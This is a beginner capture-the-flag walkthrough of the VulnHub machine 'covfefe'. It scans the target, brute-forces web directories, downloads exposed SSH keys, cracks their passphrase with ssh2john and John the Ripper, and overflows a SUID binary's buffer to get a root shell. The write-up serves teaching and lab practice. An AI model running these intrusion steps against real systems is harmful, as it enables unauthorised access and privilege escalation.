In this article we are going to solve another boot2root challenge covfefe. This is a beginner/intermediate level machine. we can download this machine from vulnhub.
First step is to scan the target and for that we used the command : netdiscover -i wlan0
Now by using the command : nmap -A 192.168.43.237 we check for the open ports.
We decided to browse HTTP Service i.e. port 80 and we found a homepage of the default nginx server.
We checked the source code but couldn't find anything useful. So we decided to explore the port number 31337 , but we got an error message. s
so we decided to bruteforce directories on both port 80 and port 31337 by using the tool dirb.
no result on port 80 ,Now its time to apply the same thing on port 31337.
Okay so we have a good amount of useful directories ,we will explore each of them one by one.
content of /robots.txt
Okay now we open the directory /taxes.
we have found our first flag!! Now it's time to explore other directories also. So .ssh looks quite useful for us because this directory may have public and private key that we can use to connect to SSH.
that's a good thing for us , so we download all the three files in our machine.
Now we decided to read the content of these files and finally we found a user in the file authorized_keys
Now we have username,private and public keys to connect to SSH. So without wasting our time we decided to connect to SSH by using the command : ssh -i id_rsa email@example.com
Okay now we decided to give permission to bot the files (id_rsa and id_rsa.pub)
by using the command : chmod 400 id_rsa and chmod 400 id_rsa.pub .
now we again try to connect to SSH using the same command . Now we again try to connect to SSH but this time it is asking for the password,means id_rsa file is protected . So we decided to use ssh2john.py to find the passphrase.
we can find this file in /usr/share/john/ssh2john.py . we used the command /usr/share/john/ssh2john.py /root/Downloads/id_rsa > crack_it .
Now we will use johntheripper to crack the passphrase.
Now we again tried to connect to SSH and this time we succeed!
now its time for privilege escalation . Now we started to look for SUID binaries and we found a binary with name read_message .
we execute this binary and it prompt us to enter the name and we got a warning if we enter the wrong name!
we changed our directory to /root and there we found two files , one is the flag and another one is the C code for the binary read_message .
So after reading this C code we have found many useful information like : the correct name to enter after running this binary is : Simon and if we notice the size of the buffer is 20 bytes . So , here we can think of buffer overflow attack . so we again run the binary by exceeding the input to 20 characters by including the command /bin/sh and yes we got the root shell!!